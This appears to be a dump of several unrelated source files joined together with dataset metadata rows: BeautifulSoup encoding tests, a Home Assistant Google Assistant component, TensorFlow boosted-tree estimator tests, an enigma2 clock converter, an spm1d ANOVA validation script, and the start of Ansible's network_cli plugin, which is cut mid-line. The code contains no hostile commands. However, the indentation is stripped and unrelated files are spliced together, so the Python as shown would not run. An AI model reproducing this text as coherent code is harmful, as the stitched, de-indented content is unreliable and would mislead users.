expected = unicode_html.replace("ISO-Latin-1", "utf-8")
# And, of course, it would be in UTF-8, not Unicode.
expected = expected.encode("utf-8")
# Ta-da!
self.assertEqual(result, expected)
def test_real_shift_jis_document(self):
# Smoke test to make sure the parser can handle a document in
# Shift-JIS encoding, without choking.
shift_jis_html = (
b'<html><head></head><body><pre>'
b'\x82\xb1\x82\xea\x82\xcdShift-JIS\x82\xc5\x83R\x81[\x83f'
b'\x83B\x83\x93\x83O\x82\xb3\x82\xea\x82\xbd\x93\xfa\x96{\x8c'
b'\xea\x82\xcc\x83t\x83@\x83C\x83\x8b\x82\xc5\x82\xb7\x81B'
b'</pre></body></html>')
unicode_html = shift_jis_html.decode("shift-jis")
soup = self.soup(unicode_html)
# Make sure the parse tree is correctly encoded to various
# encodings.
self.assertEqual(soup.encode("utf-8"), unicode_html.encode("utf-8"))
self.assertEqual(soup.encode("euc_jp"), unicode_html.encode("euc_jp"))
def test_real_hebrew_document(self):
# A real-world test to make sure we can convert ISO-8859-9 (a
# Hebrew encoding) to UTF-8.
hebrew_document = b'<html><head><title>Hebrew (ISO 8859-8) in Visual Directionality</title></head><body><h1>Hebrew (ISO 8859-8) in Visual Directionality</h1>\xed\xe5\xec\xf9</body></html>'
soup = self.soup(
hebrew_document, from_encoding="iso8859-8")
self.assertEqual(soup.original_encoding, 'iso8859-8')
self.assertEqual(
soup.encode('utf-8'),
hebrew_document.decode("iso8859-8").encode("utf-8"))
def test_meta_tag_reflects_current_encoding(self):
# Here's the <meta> tag saying that a document is
# encoded in Shift-JIS.
meta_tag = ('<meta content="text/html; charset=x-sjis" '
'http-equiv="Content-type"/>')
# Here's a document incorporating that meta tag.
shift_jis_html = (
'<html><head>\n%s\n'
'<meta http-equiv="Content-language" content="ja"/>'
'</head><body>Shift-JIS markup goes here.') % meta_tag
soup = self.soup(shift_jis_html)
# Parse the document, and the charset is replaced with a
# generic value.
parsed_meta = soup.find('meta', {'http-equiv': 'Content-type'})
self.assertEqual(parsed_meta['content'],
'text/html; charset=%SOUP-ENCODING%')
self.assertEqual(parsed_meta.contains_substitutions, True)
# For the rest of the story, see TestSubstitutions in
# test_tree.py.
def test_html5_style_meta_tag_reflects_current_encoding(self):
# Here's the <meta> tag saying that a document is
# encoded in Shift-JIS.
meta_tag = ('<meta id="encoding" charset="x-sjis" />')
# Here's a document incorporating that meta tag.
shift_jis_html = (
'<html><head>\n%s\n'
'<meta http-equiv="Content-language" content="ja"/>'
'</head><body>Shift-JIS markup goes here.') % meta_tag
soup = self.soup(shift_jis_html)
# Parse the document, and the charset is replaced with a
# generic value.
parsed_meta = soup.find('meta', id="encoding")
self.assertEqual('%SOUP-ENCODING%', parsed_meta['charset'])
self.assertEqual(True, parsed_meta.contains_substitutions)
class XMLTreeBuilderSmokeTest(object):
def test_docstring_generated(self):
soup = self.soup("<root/>")
self.assertEqual(
soup.encode(), b'<?xml version="1.0" encoding="utf-8"?>\n<root/>')
def test_docstring_includes_correct_encoding(self):
soup = self.soup("<root/>")
self.assertEqual(
soup.encode("latin1"),
b'<?xml version="1.0" encoding="latin1"?>\n<root/>')
def test_real_xhtml_document(self):
"""A real XHTML document should come out the same as it went in."""
markup = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Hello.</title></head>
<body>Goodbye.</body>
</html>"""
soup = self.soup(markup)
self.assertEqual(soup.encode("utf-8"), markup)
def test_tags_are_empty_element_if_and_only_if_they_are_empty(self):
self.assertSoupEquals("<p>", "<p/>")
self.assertSoupEquals("<p>foo</p>")
def test_namespaces_are_preserved(self):
markup = '<root xmlns:a="http://example.com/" xmlns:b="http://example.net/"><a:foo>This tag is in the a namespace</a:foo><b:foo>This tag is in the b namespace</b:foo></root>'
soup = self.soup(markup)
root = soup.root
self.assertEqual("http://example.com/", root['xmlns:a'])
self.assertEqual("http://example.net/", root['xmlns:b'])
class HTML5TreeBuilderSmokeTest(HTMLTreeBuilderSmokeTest):
"""Smoke test for a tree builder that supports HTML5."""
def test_html_tags_have_namespace(self):
markup = "<a>"
soup = self.soup(markup)
self.assertEqual("http://www.w3.org/1999/xhtml", soup.a.namespace)
def test_svg_tags_have_namespace(self):
markup = '<svg><circle/></svg>'
soup = self.soup(markup)
namespace = "http://www.w3.org/2000/svg"
self.assertEqual(namespace, soup.svg.namespace)
self.assertEqual(namespace, soup.circle.namespace)
def test_mathml_tags_have_namespace(self):
markup = '<math><msqrt>5</msqrt></math>'
soup = self.soup(markup)
namespace = 'http://www.w3.org/1998/Math/MathML'
self.assertEqual(namespace, soup.math.namespace)
self.assertEqual(namespace, soup.msqrt.namespace)
def skipIf(condition, reason):
def nothing(test, *args, **kwargs):
return None
def decorator(test_item):
if condition:
return nothing
else:
return test_item
return decorator
| apache-2.0 | 7,447,682,666,164,341,000 | 39.615217 | 237 | 0.614409 | false |
partofthething/home-assistant | homeassistant/components/google_assistant/__init__.py | 2 | 3785 | """Support for Actions on Google Assistant Smart Home Control."""
import logging
from typing import Any, Dict
import voluptuous as vol
# Typing imports
from homeassistant.const import CONF_API_KEY, CONF_NAME
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import config_validation as cv
from .const import (
CONF_ALIASES,
CONF_CLIENT_EMAIL,
CONF_ENTITY_CONFIG,
CONF_EXPOSE,
CONF_EXPOSE_BY_DEFAULT,
CONF_EXPOSED_DOMAINS,
CONF_PRIVATE_KEY,
CONF_PROJECT_ID,
CONF_REPORT_STATE,
CONF_ROOM_HINT,
CONF_SECURE_DEVICES_PIN,
CONF_SERVICE_ACCOUNT,
DEFAULT_EXPOSE_BY_DEFAULT,
DEFAULT_EXPOSED_DOMAINS,
DOMAIN,
SERVICE_REQUEST_SYNC,
)
from .const import EVENT_QUERY_RECEIVED # noqa: F401
from .http import GoogleAssistantView, GoogleConfig
from .const import EVENT_COMMAND_RECEIVED, EVENT_SYNC_RECEIVED # noqa: F401, isort:skip
_LOGGER = logging.getLogger(__name__)
CONF_ALLOW_UNLOCK = "allow_unlock"
ENTITY_SCHEMA = vol.Schema(
{
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_EXPOSE, default=True): cv.boolean,
vol.Optional(CONF_ALIASES): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_ROOM_HINT): cv.string,
}
)
GOOGLE_SERVICE_ACCOUNT = vol.Schema(
{
vol.Required(CONF_PRIVATE_KEY): cv.string,
vol.Required(CONF_CLIENT_EMAIL): cv.string,
},
extra=vol.ALLOW_EXTRA,
)
def _check_report_state(data):
if data[CONF_REPORT_STATE] and CONF_SERVICE_ACCOUNT not in data:
raise vol.Invalid("If report state is enabled, a service account must exist")
return data
GOOGLE_ASSISTANT_SCHEMA = vol.All(
vol.Schema(
{
vol.Required(CONF_PROJECT_ID): cv.string,
vol.Optional(
CONF_EXPOSE_BY_DEFAULT, default=DEFAULT_EXPOSE_BY_DEFAULT
): cv.boolean,
vol.Optional(
CONF_EXPOSED_DOMAINS, default=DEFAULT_EXPOSED_DOMAINS
): cv.ensure_list,
vol.Optional(CONF_ENTITY_CONFIG): {cv.entity_id: ENTITY_SCHEMA},
# str on purpose, makes sure it is configured correctly.
vol.Optional(CONF_SECURE_DEVICES_PIN): str,
vol.Optional(CONF_REPORT_STATE, default=False): cv.boolean,
vol.Optional(CONF_SERVICE_ACCOUNT): GOOGLE_SERVICE_ACCOUNT,
# deprecated configuration options
vol.Remove(CONF_ALLOW_UNLOCK): cv.boolean,
vol.Remove(CONF_API_KEY): cv.string,
},
extra=vol.PREVENT_EXTRA,
),
_check_report_state,
)
CONFIG_SCHEMA = vol.Schema({DOMAIN: GOOGLE_ASSISTANT_SCHEMA}, extra=vol.ALLOW_EXTRA)
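# Illustrative configuration sketch that this schema accepts (added
# commentary; the project id and file name are placeholders):
#
#   google_assistant:
#     project_id: my-hypothetical-project
#     report_state: true
#     service_account: !include SERVICE_ACCOUNT.json
#     exposed_domains:
#       - light
#       - switch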
async def async_setup(hass: HomeAssistant, yaml_config: Dict[str, Any]):
"""Activate Google Actions component."""
config = yaml_config.get(DOMAIN, {})
google_config = GoogleConfig(hass, config)
await google_config.async_initialize()
hass.http.register_view(GoogleAssistantView(google_config))
if google_config.should_report_state:
google_config.async_enable_report_state()
async def request_sync_service_handler(call: ServiceCall):
"""Handle request sync service calls."""
agent_user_id = call.data.get("agent_user_id") or call.context.user_id
if agent_user_id is None:
_LOGGER.warning(
"No agent_user_id supplied for request_sync. Call as a user or pass in user id as agent_user_id"
)
return
await google_config.async_sync_entities(agent_user_id)
# Register service only if key is provided
if CONF_SERVICE_ACCOUNT in config:
hass.services.async_register(
DOMAIN, SERVICE_REQUEST_SYNC, request_sync_service_handler
)
return True
| mit | -3,595,111,798,618,168,300 | 30.541667 | 112 | 0.662351 | false |
jendap/tensorflow | tensorflow/contrib/boosted_trees/estimator_batch/dnn_tree_combined_estimator_test.py | 20 | 9393 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for combined DNN + GBDT estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.contrib.boosted_trees.estimator_batch import dnn_tree_combined_estimator as estimator
from tensorflow.contrib.boosted_trees.proto import learner_pb2
from tensorflow.contrib.layers.python.layers import feature_column
from tensorflow.contrib.learn.python.learn.estimators import estimator_test_utils
from tensorflow.contrib.learn.python.learn.estimators import run_config
from tensorflow.python.estimator import exporter
from tensorflow.python.estimator.canned import head as head_lib
from tensorflow.python.estimator.export import export
from tensorflow.python.ops import parsing_ops
from tensorflow.python.feature_column import feature_column_lib as core_feature_column
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import googletest
from tensorflow.python.training import checkpoint_utils
def _train_input_fn():
features = {
"x": constant_op.constant([[2.], [1.], [1.]])
}
label = constant_op.constant([[1], [0], [0]], dtype=dtypes.int32)
return features, label
def _eval_input_fn():
features = {
"x": constant_op.constant([[1.], [2.], [2.]])
}
label = constant_op.constant([[0], [1], [1]], dtype=dtypes.int32)
return features, label
class DNNBoostedTreeCombinedTest(test_util.TensorFlowTestCase):
def testClassifierContract(self):
estimator_test_utils.assert_estimator_contract(
self, estimator.DNNBoostedTreeCombinedClassifier)
def testRegressorContract(self):
estimator_test_utils.assert_estimator_contract(
self, estimator.DNNBoostedTreeCombinedRegressor)
def testEstimatorContract(self):
estimator_test_utils.assert_estimator_contract(
self, estimator.DNNBoostedTreeCombinedEstimator)
def testNoDNNFeatureColumns(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
with self.assertRaisesRegexp(
ValueError,
"dnn_feature_columns must be specified"):
classifier = estimator.DNNBoostedTreeCombinedClassifier(
dnn_hidden_units=[1],
dnn_feature_columns=[],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
n_classes=2)
classifier.fit(input_fn=_train_input_fn, steps=5)
def testFitAndEvaluateDontThrowException(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.DNNBoostedTreeCombinedClassifier(
dnn_hidden_units=[1],
dnn_feature_columns=[feature_column.real_valued_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
n_classes=2,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=False,
tree_feature_columns=[feature_column.real_valued_column("x")])
classifier.fit(input_fn=_train_input_fn, steps=15)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
def testFitAndEvaluateWithDistillation(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.DNNBoostedTreeCombinedClassifier(
dnn_hidden_units=[1],
dnn_feature_columns=[feature_column.real_valued_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
n_classes=2,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=False,
tree_feature_columns=[feature_column.real_valued_column("x")],
dnn_to_tree_distillation_param=(1, None))
classifier.fit(input_fn=_train_input_fn, steps=15)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
class CoreDNNBoostedTreeCombinedTest(test_util.TensorFlowTestCase):
def _assert_checkpoint(self, model_dir, global_step):
reader = checkpoint_utils.load_checkpoint(model_dir)
self.assertEqual(global_step, reader.get_tensor(ops.GraphKeys.GLOBAL_STEP))
def testTrainEvaluateInferDoesNotThrowErrorWithNoDnnInput(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreDNNBoostedTreeCombinedEstimator(
head=head_fn,
dnn_hidden_units=[1],
dnn_feature_columns=[core_feature_column.numeric_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=False,
tree_feature_columns=[core_feature_column.numeric_column("x")])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
# 10 steps for dnn, 3 for 1 tree of depth 3 + 1 after the tree finished
self._assert_checkpoint(est.model_dir, global_step=14)
res = est.evaluate(input_fn=_eval_input_fn, steps=1)
self.assertLess(0.5, res["auc"])
est.predict(input_fn=_eval_input_fn)
def testTrainEvaluateInferDoesNotThrowErrorWithDnnInput(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreDNNBoostedTreeCombinedEstimator(
head=head_fn,
dnn_hidden_units=[1],
dnn_feature_columns=[core_feature_column.numeric_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=True,
tree_feature_columns=[])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
res = est.evaluate(input_fn=_eval_input_fn, steps=1)
self.assertLess(0.5, res["auc"])
est.predict(input_fn=_eval_input_fn)
def testTrainEvaluateWithDnnForInputAndTreeForPredict(self):
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 3
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
est = estimator.CoreDNNBoostedTreeCombinedEstimator(
head=head_fn,
dnn_hidden_units=[1],
dnn_feature_columns=[core_feature_column.numeric_column("x")],
tree_learner_config=learner_config,
num_trees=1,
tree_examples_per_layer=3,
model_dir=model_dir,
config=config,
dnn_steps_to_train=10,
dnn_input_layer_to_tree=True,
predict_with_tree_only=True,
dnn_to_tree_distillation_param=(0.5, None),
tree_feature_columns=[])
# Train for a few steps.
est.train(input_fn=_train_input_fn, steps=1000)
res = est.evaluate(input_fn=_eval_input_fn, steps=1)
self.assertLess(0.5, res["auc"])
est.predict(input_fn=_eval_input_fn)
serving_input_fn = (
export.build_parsing_serving_input_receiver_fn(
feature_spec={"x": parsing_ops.FixedLenFeature(
[1], dtype=dtypes.float32)}))
base_exporter = exporter.FinalExporter(
name="Servo",
serving_input_receiver_fn=serving_input_fn,
assets_extra=None)
export_path = os.path.join(model_dir, "export")
base_exporter.export(
est,
export_path=export_path,
checkpoint_path=None,
eval_result={},
is_the_final_export=True)
if __name__ == "__main__":
googletest.main()
| apache-2.0 | -2,859,730,329,530,242,000 | 36.722892 | 101 | 0.692111 | false |
eurosata1/e2 | lib/python/Components/Converter/ClockToText.py | 42 | 3445 | from Converter import Converter
from time import localtime, strftime
from Components.Element import cached
class ClockToText(Converter, object):
DEFAULT = 0
WITH_SECONDS = 1
IN_MINUTES = 2
DATE = 3
FORMAT = 4
AS_LENGTH = 5
TIMESTAMP = 6
FULL = 7
SHORT_DATE = 8
LONG_DATE = 9
VFD = 10
AS_LENGTHHOURS = 11
AS_LENGTHSECONDS = 12
# add: date, date as string, weekday, ...
# (whatever you need!)
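	# Hedged usage sketch (added comment, not part of the original converter):
	# in a skin XML this converter is normally attached to a clock source, e.g.
	#   <widget source="global.CurrentTime" render="Label">
	#     <convert type="ClockToText">Format:%H:%M:%S</convert>
	#   </widget>
	# The string after "ClockToText" selects one of the types parsed in
	# __init__ below ("Default", "WithSeconds", "Format:...", etc.).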
def __init__(self, type):
Converter.__init__(self, type)
self.fix = ""
if ';' in type:
type, self.fix = type.split(';')
if type == "WithSeconds":
self.type = self.WITH_SECONDS
elif type == "InMinutes":
self.type = self.IN_MINUTES
elif type == "Date":
self.type = self.DATE
elif type == "AsLength":
self.type = self.AS_LENGTH
elif type == "AsLengthHours":
self.type = self.AS_LENGTHHOURS
elif type == "AsLengthSeconds":
self.type = self.AS_LENGTHSECONDS
elif type == "Timestamp":
self.type = self.TIMESTAMP
elif type == "Full":
self.type = self.FULL
elif type == "ShortDate":
self.type = self.SHORT_DATE
elif type == "LongDate":
self.type = self.LONG_DATE
elif type == "VFD":
self.type = self.VFD
elif "Format" in type:
self.type = self.FORMAT
self.fmt_string = type[7:]
else:
self.type = self.DEFAULT
@cached
def getText(self):
time = self.source.time
if time is None:
return ""
# add/remove 1st space
def fix_space(string):
if "Proportional" in self.fix and t.tm_hour < 10:
return " " + string
if "NoSpace" in self.fix:
return string.lstrip(' ')
return string
# handle durations
if self.type == self.IN_MINUTES:
return _("%d min") % (time / 60)
elif self.type == self.AS_LENGTH:
if time < 0:
return ""
return "%d:%02d" % (time / 60, time % 60)
elif self.type == self.AS_LENGTHHOURS:
if time < 0:
return ""
return "%d:%02d" % (time / 3600, time / 60 % 60)
elif self.type == self.AS_LENGTHSECONDS:
if time < 0:
return ""
return "%d:%02d:%02d" % (time / 3600, time / 60 % 60, time % 60)
elif self.type == self.TIMESTAMP:
return str(time)
t = localtime(time)
if self.type == self.WITH_SECONDS:
# TRANSLATORS: full time representation hour:minute:seconds
return fix_space(_("%2d:%02d:%02d") % (t.tm_hour, t.tm_min, t.tm_sec))
elif self.type == self.DEFAULT:
# TRANSLATORS: short time representation hour:minute
return fix_space(_("%2d:%02d") % (t.tm_hour, t.tm_min))
elif self.type == self.DATE:
# TRANSLATORS: full date representation dayname daynum monthname year in strftime() format! See 'man strftime'
d = _("%A %e %B %Y")
elif self.type == self.FULL:
# TRANSLATORS: long date representation short dayname daynum short monthname hour:minute in strftime() format! See 'man strftime'
d = _("%a %e/%m %-H:%M")
elif self.type == self.SHORT_DATE:
# TRANSLATORS: short date representation short dayname daynum short monthname in strftime() format! See 'man strftime'
d = _("%a %e/%m")
elif self.type == self.LONG_DATE:
# TRANSLATORS: long date representations dayname daynum monthname in strftime() format! See 'man strftime'
d = _("%A %e %B")
elif self.type == self.VFD:
# TRANSLATORS: VFD hour:minute daynum short monthname in strftime() format! See 'man strftime'
d = _("%k:%M %e/%m")
elif self.type == self.FORMAT:
d = self.fmt_string
else:
return "???"
return strftime(d, t)
text = property(getText)
| gpl-2.0 | 5,178,587,818,289,730,000 | 27.94958 | 132 | 0.6418 | false |
0todd0000/spm1d | spm1d/rft1d/examples/val_max_4_anova1_1d.py | 1 | 2121 |
import numpy as np
from matplotlib import pyplot
from spm1d import rft1d
eps = np.finfo(float).eps
def here_anova1(Y, X, X0, Xi, X0i, df):
Y = np.matrix(Y)
### estimate parameters:
b = Xi*Y
eij = Y - X*b
R = eij.T*eij
### reduced design:
b0 = X0i*Y
eij0 = Y - X0*b0
R0 = eij0.T*eij0
### compute F statistic:
F = ((np.diag(R0)-np.diag(R))/df[0]) / (np.diag(R+eps)/df[1])
return F
def here_design_matrices(nResponses, nGroups):
nTotal = sum(nResponses)
X = np.zeros((nTotal,nGroups))
i0 = 0
for i,n in enumerate(nResponses):
X[i0:i0+n,i] = 1
i0 += n
X = np.matrix(X)
X0 = np.matrix(np.ones(nTotal)).T #reduced design matrix
Xi,X0i = np.linalg.pinv(X), np.linalg.pinv(X0) #pseudo-inverses
return X,X0,Xi,X0i
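# Added explanatory note (not in the original script): X is the one-hot
# group-membership design matrix and X0 the intercept-only reduced design;
# here_anova1() compares the residuals of the two fits node-by-node to form
# the F statistic whose field maximum is validated against RFT below.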
#(0) Set parameters:
np.random.seed(123456789)
nResponses = 6,8,9 #number of responses in each group
nNodes = 101
FWHM = 12.0
nIterations = 5000
### derived parameters:
nGroups = len(nResponses)
nTotal = sum(nResponses)
df = nGroups-1, nTotal-nGroups
X,X0,Xi,X0i = here_design_matrices(nResponses, nGroups)
#(1) Generate Gaussian 1D fields, compute test stat, store field maximum:
F = []
generator = rft1d.random.Generator1D(nTotal, nNodes, FWHM)
for i in range(nIterations):
y = generator.generate_sample()
f = here_anova1(y, X, X0, Xi, X0i, df)
F.append( f.max() )
F = np.asarray(F)
#(2) Survival functions:
heights = np.linspace(6, 14, 21)
sf = np.array( [ (F>h).mean() for h in heights] )
sfE = rft1d.f.sf(heights, df, nNodes, FWHM) #theoretical
sf0D = rft1d.f.sf0d(heights, df) #theoretical (0D)
#(3) Plot results:
pyplot.close('all')
ax = pyplot.axes()
ax.plot(heights, sf, 'o', label='Simulated')
ax.plot(heights, sfE, '-', label='Theoretical')
ax.plot(heights, sf0D, 'r-', label='Theoretical (0D)')
ax.set_xlabel('$u$', size=20)
ax.set_ylabel('$P (F_\mathrm{max} > u)$', size=20)
ax.legend()
ax.set_title('ANOVA validation (1D)', size=20)
pyplot.show()
| gpl-3.0 | 3,806,504,572,669,593,000 | 25.848101 | 73 | 0.602074 | false |
hogarthj/ansible | lib/ansible/plugins/connection/network_cli.py | 5 | 19736 | # (c) 2016 Red Hat Inc.
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
author: Ansible Networking Team
connection: network_cli
short_description: Use network_cli to run command on network appliances
description:
- This connection plugin provides a connection to remote devices over the
SSH and implements a CLI shell. This connection plugin is typically used by
    network devices for sending and receiving CLI commands to network devices.
version_added: "2.3"
options:
host:
description:
- Specifies the remote device FQDN or IP address to establish the SSH
connection to.
default: inventory_hostname
vars:
- name: ansible_host
port:
type: int
description:
      - Specifies the port on the remote device to listen for connections
when establishing the SSH connection.
default: 22
ini:
- section: defaults
key: remote_port
env:
- name: ANSIBLE_REMOTE_PORT
vars:
- name: ansible_port
network_os:
description:
- Configures the device platform network operating system. This value is
used to load the correct terminal and cliconf plugins to communicate
with the remote device
vars:
- name: ansible_network_os
remote_user:
description:
- The username used to authenticate to the remote device when the SSH
connection is first established. If the remote_user is not specified,
the connection will use the username of the logged in user.
      - Can be configured from the CLI via the C(--user) or C(-u) options
ini:
- section: defaults
key: remote_user
env:
- name: ANSIBLE_REMOTE_USER
vars:
- name: ansible_user
password:
description:
- Configures the user password used to authenticate to the remote device
when first establishing the SSH connection.
vars:
- name: ansible_password
- name: ansible_ssh_pass
private_key_file:
description:
- The private SSH key or certificate file used to to authenticate to the
remote device when first establishing the SSH connection.
ini:
section: defaults
key: private_key_file
env:
- name: ANSIBLE_PRIVATE_KEY_FILE
vars:
- name: ansible_private_key_file
timeout:
type: int
description:
      - Sets the connection timeout, in seconds, for communicating with the
remote device. This timeout is used as the default timeout value for
commands when issuing a command to the network CLI. If the command
        does not return in timeout seconds, an error is generated.
default: 120
become:
type: boolean
description:
- The become option will instruct the CLI session to attempt privilege
escalation on platforms that support it. Normally this means
transitioning from user mode to C(enable) mode in the CLI session.
If become is set to True and the remote device does not support
privilege escalation or the privilege has already been elevated, then
this option is silently ignored
      - Can be configured from the CLI via the C(--become) or C(-b) options
default: False
ini:
section: privilege_escalation
key: become
env:
- name: ANSIBLE_BECOME
vars:
- name: ansible_become
become_method:
description:
      - This option allows the become method to be specified for handling
privilege escalation. Typically the become_method value is set to
C(enable) but could be defined as other values.
default: sudo
ini:
section: privilege_escalation
key: become_method
env:
- name: ANSIBLE_BECOME_METHOD
vars:
- name: ansible_become_method
host_key_auto_add:
type: boolean
description:
- By default, Ansible will prompt the user before adding SSH keys to the
known hosts file. Since persistent connections such as network_cli run
in background processes, the user will never be prompted. By enabling
this option, unknown host keys will automatically be added to the
known hosts file.
- Be sure to fully understand the security implications of enabling this
option on production systems as it could create a security vulnerability.
default: False
ini:
section: paramiko_connection
key: host_key_auto_add
env:
- name: ANSIBLE_HOST_KEY_AUTO_ADD
persistent_connect_timeout:
type: int
description:
- Configures, in seconds, the amount of time to wait when trying to
initially establish a persistent connection. If this value expires
before the connection to the remote device is completed, the connection
will fail
default: 30
ini:
section: persistent_connection
key: persistent_connect_timeout
env:
- name: ANSIBLE_PERSISTENT_CONNECT_TIMEOUT
persistent_command_timeout:
type: int
description:
- Configures, in seconds, the amount of time to wait for a command to
return from the remote device. If this timer is exceeded before the
command returns, the connection plugin will raise an exception and
close
default: 10
ini:
section: persistent_connection
key: persistent_command_timeout
env:
- name: ANSIBLE_PERSISTENT_COMMAND_TIMEOUT
"""
import json
import logging
import re
import os
import socket
import traceback
from ansible import constants as C
from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils.six import BytesIO, PY3
from ansible.module_utils.six.moves import cPickle
from ansible.module_utils._text import to_bytes, to_text
from ansible.playbook.play_context import PlayContext
from ansible.plugins.loader import cliconf_loader, terminal_loader, connection_loader
from ansible.plugins.connection import ConnectionBase
from ansible.utils.path import unfrackpath
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class Connection(ConnectionBase):
''' CLI (shell) SSH connections on Paramiko '''
transport = 'network_cli'
has_pipelining = True
force_persistence = True
def __init__(self, play_context, new_stdin, *args, **kwargs):
super(Connection, self).__init__(play_context, new_stdin, *args, **kwargs)
self._ssh_shell = None
self._matched_prompt = None
self._matched_pattern = None
self._last_response = None
self._history = list()
self._play_context = play_context
self._local = connection_loader.get('local', play_context, '/dev/null')
self._local.set_options()
self._terminal = None
self._cliconf = None
self._ansible_playbook_pid = kwargs.get('ansible_playbook_pid')
if self._play_context.verbosity > 3:
logging.getLogger('paramiko').setLevel(logging.DEBUG)
# reconstruct the socket_path and set instance values accordingly
self._update_connection_state()
def __getattr__(self, name):
try:
return self.__dict__[name]
except KeyError:
if name.startswith('_'):
raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, name))
return getattr(self._cliconf, name)
def get_prompt(self):
"""Returns the current prompt from the device"""
return self._matched_prompt
def exec_command(self, cmd, in_data=None, sudoable=True):
# this try..except block is just to handle the transition to supporting
# network_cli as a toplevel connection. Once connection=local is gone,
# this block can be removed as well and all calls passed directly to
# the local connection
if self._ssh_shell:
try:
cmd = json.loads(to_text(cmd, errors='surrogate_or_strict'))
kwargs = {'command': to_bytes(cmd['command'], errors='surrogate_or_strict')}
for key in ('prompt', 'answer', 'sendonly', 'newline', 'prompt_retry_check'):
if cmd.get(key) is True or cmd.get(key) is False:
kwargs[key] = cmd[key]
elif cmd.get(key) is not None:
kwargs[key] = to_bytes(cmd[key], errors='surrogate_or_strict')
return self.send(**kwargs)
except ValueError:
cmd = to_bytes(cmd, errors='surrogate_or_strict')
return self.send(command=cmd)
else:
return self._local.exec_command(cmd, in_data, sudoable)
def put_file(self, in_path, out_path):
return self._local.put_file(in_path, out_path)
def fetch_file(self, in_path, out_path):
return self._local.fetch_file(in_path, out_path)
def update_play_context(self, pc_data):
"""Updates the play context information for the connection"""
pc_data = to_bytes(pc_data)
if PY3:
pc_data = cPickle.loads(pc_data, encoding='bytes')
else:
pc_data = cPickle.loads(pc_data)
play_context = PlayContext()
play_context.deserialize(pc_data)
messages = ['updating play_context for connection']
if self._play_context.become is False and play_context.become is True:
auth_pass = play_context.become_pass
self._terminal.on_become(passwd=auth_pass)
messages.append('authorizing connection')
elif self._play_context.become is True and not play_context.become:
self._terminal.on_unbecome()
messages.append('deauthorizing connection')
self._play_context = play_context
return messages
def _connect(self):
'''
Connects to the remote device and starts the terminal
'''
if self.connected:
return
self.paramiko_conn = connection_loader.get('paramiko', self._play_context, '/dev/null')
self.paramiko_conn.set_options(direct={'look_for_keys': not bool(self._play_context.password and not self._play_context.private_key_file)})
self.paramiko_conn.force_persistence = self.force_persistence
ssh = self.paramiko_conn._connect()
display.vvvv('ssh connection done, setting terminal', host=self._play_context.remote_addr)
self._ssh_shell = ssh.ssh.invoke_shell()
self._ssh_shell.settimeout(self._play_context.timeout)
network_os = self._play_context.network_os
if not network_os:
raise AnsibleConnectionFailure(
'Unable to automatically determine host network os. Please '
